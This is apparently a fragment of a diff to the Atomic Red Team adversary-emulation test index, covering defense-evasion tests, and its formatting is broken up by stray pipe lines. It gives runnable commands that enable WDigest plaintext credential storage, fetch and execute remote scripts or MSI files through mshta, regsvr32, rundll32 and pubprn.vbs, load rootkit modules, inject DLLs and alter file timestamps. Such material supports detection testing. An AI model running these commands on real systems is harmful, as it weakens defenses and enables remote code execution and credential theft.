|
|
|
|
|
{
|
|
|
|
|
for ($l = 0; $l -lt ($SIDObject | Measure-Object).count; $l++)
|
|
|
|
|
{
|
|
|
|
|
if (($ProfileList[$p].SID) -ne ($SIDObject[$l].SID))
|
|
|
|
|
{
|
|
|
|
|
$UnloadedHives += $ProfileList[$p].SID
|
|
|
|
|
Write-Verbose -Message "Loading Registry hives for $($ProfileList[$p].SID)"
|
|
|
|
|
reg load "HKU\$($ProfileList[$p].SID)" "$($ProfileList[$p].UserHive)"
|
|
|
|
|
|
|
|
|
|
Write-Verbose -Message 'Attempting to modify registry keys for each profile'
|
|
|
|
|
#####################################################################
|
|
|
|
|
reg add "HKEY_CURRENT_USER\$($ProfileList[$p].SID)\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t REG_DWORD /v HideFileExt /d 1 /f
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
Write-Verbose 'Unloading Registry hives for all users'
|
|
|
|
|
# Unload ntuser.dat
|
|
|
|
|
### Garbage collection and closing of ntuser.dat ###
|
|
|
|
|
[gc]::Collect()
|
|
|
|
|
reg unload "HKU\$($ProfileList[$p].SID)"
|
|
|
|
|
'
|
|
|
|
|
- name: Modify registry to store logon credentials
|
|
|
|
|
description: 'Sets registry key that will tell windows to store plaintext passwords
|
|
|
|
|
(making the system vulnerable to clear text / cleartext password dumping)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
|
|
|
|
|
Upon execution, the message "The operation completed successfully." will be displayed.
|
|
|
|
|
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -10024,68 +10049,42 @@ defense-evasion:
|
|
|
|
|
command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
|
|
|
|
|
/v UseLogonCredential /t REG_DWORD /d 1 /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
|
|
|
|
|
/v UseLogonCredential /t REG_DWORD /d 0 /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Modify registry to store PowerShell code
|
|
|
|
|
description: 'Sets Windows Registry key containing base64-encoded PowerShell
|
|
|
|
|
code.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
powershell_command:
|
|
|
|
|
description: PowerShell command to encode
|
|
|
|
|
type: String
|
|
|
|
|
default: Write-Host "Hey, Atomic!"
|
|
|
|
|
registry_key_storage:
|
|
|
|
|
description: Windows Registry Key to store code
|
|
|
|
|
type: String
|
|
|
|
|
default: HKCU:Software\Microsoft\Windows\CurrentVersion
|
|
|
|
|
registry_entry_storage:
|
|
|
|
|
description: Windows Registry entry to store code under key
|
|
|
|
|
type: String
|
|
|
|
|
default: Debug
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
$OriginalCommand = '#{powershell_command}'
|
|
|
|
|
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
|
|
|
|
|
$EncodedCommand =[Convert]::ToBase64String($Bytes)
|
|
|
|
|
$EncodedCommand
|
|
|
|
|
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty -Force -Path #{registry_key_storage}
|
|
|
|
|
-Name #{registry_entry_storage} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Add domain to Trusted sites Zone
|
|
|
|
|
description: |
|
|
|
|
|
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here:
|
|
|
|
|
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
|
|
|
|
|
Upon execution, details of the new registry entries will be displayed.
|
|
|
|
|
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
|
|
|
|
|
|
|
|
|
|
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
bad_domain:
|
|
|
|
|
description: Domain to add to trusted site zone
|
|
|
|
|
type: String
|
|
|
|
|
default: bad-domain.com
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
|
|
|
|
|
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
|
|
|
|
|
$name ="bad-subdomain"
|
|
|
|
|
new-item $key -Name $name -Force
|
|
|
|
|
new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
|
|
|
|
|
new-itemproperty $key$name -Name http -Value 2 -Type DWORD;
|
|
|
|
|
new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
|
|
|
|
|
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
|
|
|
|
|
Remove-item $key -Recurse -ErrorAction Ignore
|
|
|
|
|
- name: Javascript in registry
|
|
|
|
|
description: 'Upon execution, a javascript block will be placed in the registry
|
|
|
|
|
for persistence
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Upon execution, a javascript block will be placed in the registry for persistence.
|
|
|
|
|
Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -10094,11 +10093,11 @@ defense-evasion:
|
|
|
|
|
command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
|
|
|
|
|
Settings" -Name T1112 -Value "<script>"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
|
|
|
|
|
Settings" -Name T1112 -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1170:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -10203,7 +10202,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mshta calls a local VBScript file to launch notepad.exe
|
|
|
|
|
description: Tests execution of a local program by a VBScript file called by
|
|
|
|
|
Mshta
|
|
|
|
@@ -10218,7 +10217,7 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""#{local_file_path}"")(window.close)")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mshta executes VBScript to execute malicious command
|
|
|
|
|
description: |
|
|
|
|
|
Run a local VB script to run local user enumeration powershell command
|
|
|
|
@@ -10231,7 +10230,7 @@ defense-evasion:
|
|
|
|
|
command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
|
|
|
|
|
-noexit -file $PathToAtomicsFolder\T1170\src\powershell.ps1"":close")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mshta Executes Remote HTML Application (HTA)
|
|
|
|
|
description: |
|
|
|
|
|
Execute an arbitrary remote HTA.
|
|
|
|
@@ -10255,7 +10254,7 @@ defense-evasion:
|
|
|
|
|
mshta "#{temp_file}"
|
|
|
|
|
cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1096:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -10396,7 +10395,7 @@ defense-evasion:
|
|
|
|
|
Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
|
|
|
|
|
cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1126:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -10452,7 +10451,7 @@ defense-evasion:
|
|
|
|
|
- name: Add Network Share
|
|
|
|
|
description: 'Add a Network Share utilizing the command_prompt
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -10469,7 +10468,7 @@ defense-evasion:
|
|
|
|
|
- name: Remove Network Share
|
|
|
|
|
description: 'Removes a Network Share utilizing the command_prompt
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -10482,11 +10481,11 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net share #{share_name} /delete
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remove Network Share PowerShell
|
|
|
|
|
description: 'Removes a Network Share utilizing PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -10680,7 +10679,7 @@ defense-evasion:
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage}
|
|
|
|
|
-Name #{registry_entry_storage}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1502:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -10859,7 +10858,7 @@ defense-evasion:
|
|
|
|
|
- name: Plist Modification
|
|
|
|
|
description: 'Modify MacOS plist file in one of two directories
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -11157,7 +11156,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'echo #{path_to_shared_library} > /etc/ld.so.preload
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Shared Library Injection via LD_PRELOAD
|
|
|
|
|
description: |
|
|
|
|
|
This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
|
|
|
|
@@ -11175,7 +11174,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'LD_PRELOAD=#{path_to_shared_library} ls
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Process Injection via C#
|
|
|
|
|
description: |
|
|
|
|
|
Process Injection using C#
|
|
|
|
@@ -11273,9 +11272,10 @@ defense-evasion:
|
|
|
|
|
identifier: T1121
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Regasm Uninstall Method Call Test
|
|
|
|
|
description: 'Executes the Uninstall Method, No Admin Rights Required
|
|
|
|
|
description: 'Executes the Uninstall Method, No Admin Rights Required. Upon
|
|
|
|
|
execution, "I shouldn''t really execute either." will be displayed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11303,12 +11303,11 @@ defense-evasion:
|
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
|
|
|
|
|
cleanup_command: 'del #{output_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Regsvs Uninstall Method Call Test
|
|
|
|
|
description: 'Executes the Uninstall Method, No Admin Rights Required, Requires
|
|
|
|
|
SNK
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed
|
|
|
|
|
along with other information about the assembly being installed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11414,9 +11413,9 @@ defense-evasion:
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Regsvr32 local COM scriptlet execution
|
|
|
|
|
description: 'Regsvr32.exe is a command-line program used to register and unregister
|
|
|
|
|
OLE controls
|
|
|
|
|
OLE controls. Upon execution, calc.exe will be launched.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11436,12 +11435,11 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'regsvr32.exe /s /u /i:#{filename} scrobj.dll
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Regsvr32 remote COM scriptlet execution
|
|
|
|
|
description: 'Regsvr32.exe is a command-line program used to register and unregister
|
|
|
|
|
OLE controls
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
|
|
|
|
|
windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11454,12 +11452,12 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Regsvr32 local DLL execution
|
|
|
|
|
description: 'Regsvr32.exe is a command-line program used to register and unregister
|
|
|
|
|
OLE controls
|
|
|
|
|
OLE controls. Upon execution, calc.exe will be launched.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11481,7 +11479,7 @@ defense-evasion:
|
|
|
|
|
command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
|
|
|
|
|
/s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1014:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -11552,7 +11550,7 @@ defense-evasion:
|
|
|
|
|
- name: Loadable Kernel Module based Rootkit
|
|
|
|
|
description: 'Loadable Kernel Module based Rootkit
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11564,11 +11562,11 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'sudo insmod #{rootkit_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Loadable Kernel Module based Rootkit
|
|
|
|
|
description: 'Loadable Kernel Module based Rootkit
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11580,7 +11578,7 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'sudo modprobe #{rootkit_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows Signed Driver Rootkit Test
|
|
|
|
|
description: |
|
|
|
|
|
This test exploits a signed driver to execute code in Kernel.
|
|
|
|
@@ -11602,7 +11600,7 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'puppetstrings #{driver_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1085:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -11663,9 +11661,10 @@ defense-evasion:
|
|
|
|
|
identifier: T1085
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Rundll32 execute JavaScript Remote Payload With GetObject
|
|
|
|
|
description: 'Test execution of a remote script using rundll32.exe
|
|
|
|
|
description: 'Test execution of a remote script using rundll32.exe. Upon execution
|
|
|
|
|
notepad.exe will be opened.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11678,7 +11677,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 execute VBscript command
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
|
|
|
|
@@ -11696,7 +11695,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 advpack.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with advpack.dll.
|
|
|
|
@@ -11721,7 +11720,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 ieadvpack.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with ieadvpack.dll.
|
|
|
|
@@ -11746,7 +11745,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 syssetup.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with syssetup.dll.
|
|
|
|
@@ -11772,7 +11771,7 @@ defense-evasion:
|
|
|
|
|
command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
|
|
|
|
|
128 .\#{inf_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 setupapi.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with setupapi.dll.
|
|
|
|
@@ -11798,7 +11797,7 @@ defense-evasion:
|
|
|
|
|
command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
|
|
|
|
|
.\#{inf_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1064:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -11867,7 +11866,7 @@ defense-evasion:
|
|
|
|
|
- name: Create and Execute Bash Shell Script
|
|
|
|
|
description: 'Creates and executes a simple bash script.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -11882,7 +11881,7 @@ defense-evasion:
|
|
|
|
|
- name: Create and Execute Batch Script
|
|
|
|
|
description: 'Creates and executes a simple batch script.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11902,7 +11901,7 @@ defense-evasion:
|
|
|
|
|
\n"
|
|
|
|
|
cleanup_command: 'del #{script_to_create} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1218:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -12016,7 +12015,7 @@ defense-evasion:
|
|
|
|
|
description: 'Injects arbitrary DLL into running process specified by process
|
|
|
|
|
ID. Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12040,12 +12039,12 @@ defense-evasion:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
|
|
|
|
|
description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
|
|
|
|
|
Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12057,12 +12056,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Register-CimProvider - Execute evil dll
|
|
|
|
|
description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
|
|
|
|
|
note this dll can be served up via SMB
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12081,12 +12080,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Msiexec.exe - Execute Local MSI file
|
|
|
|
|
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
|
|
|
|
|
The MSI opens notepad.exe when sucessfully executed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12103,13 +12102,13 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'msiexec.exe /q /i "#{msi_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Msiexec.exe - Execute Remote MSI file
|
|
|
|
|
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
|
|
|
|
|
in application installation, commonly seen in malware execution. The MSI opens
|
|
|
|
|
notepad.exe when sucessfully executed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12121,7 +12120,7 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'msiexec.exe /q /i "#{msi_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Msiexec.exe - Execute Arbitrary DLL
|
|
|
|
|
description: |
|
|
|
|
|
Execute arbitrary DLL file stored locally. Commonly seen in application installation.
|
|
|
|
@@ -12145,11 +12144,11 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'msiexec.exe /y "#{dll_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Odbcconf.exe - Execute Arbitrary DLL
|
|
|
|
|
description: 'Execute arbitrary DLL file stored locally.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12168,7 +12167,7 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: InfDefaultInstall.exe .inf Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a .inf using InfDefaultInstall.exe
|
|
|
|
@@ -12193,7 +12192,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'InfDefaultInstall.exe #{inf_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1216:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -12250,7 +12249,7 @@ defense-evasion:
|
|
|
|
|
description: 'Executes the signed PubPrn.vbs script with options to download
|
|
|
|
|
and execute an arbitrary payload.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12264,12 +12263,12 @@ defense-evasion:
|
|
|
|
|
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
|
|
|
|
localhost "script:#{remote_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
|
|
|
|
|
description: 'Executes the signed SyncAppvPublishingServer script with options
|
|
|
|
|
to execute an arbitrary PowerShell command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12282,12 +12281,12 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: manage-bde.wsf Signed Script Command Execution
|
|
|
|
|
description: 'Executes the signed manage-bde.wsf script with options to execute
|
|
|
|
|
an arbitrary command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12303,7 +12302,7 @@ defense-evasion:
|
|
|
|
|
cscript manage-bde.wsf
|
|
|
|
|
cleanup_command: 'set comspec=C:\Windows\System32\cmd.exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1151:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -12364,7 +12363,7 @@ defense-evasion:
|
|
|
|
|
- name: Space After Filename
|
|
|
|
|
description: 'Space After Filename
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -12426,7 +12425,7 @@ defense-evasion:
|
|
|
|
|
- name: Set a file's access timestamp
|
|
|
|
|
description: 'Stomps on the access timestamp of a file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -12439,11 +12438,11 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'touch -a -t 197001010000.00 #{target_filename}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Set a file's modification timestamp
|
|
|
|
|
description: 'Stomps on the modification timestamp of a file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -12456,7 +12455,7 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'touch -m -t 197001010000.00 #{target_filename}
|
|
|
|
|
|
|
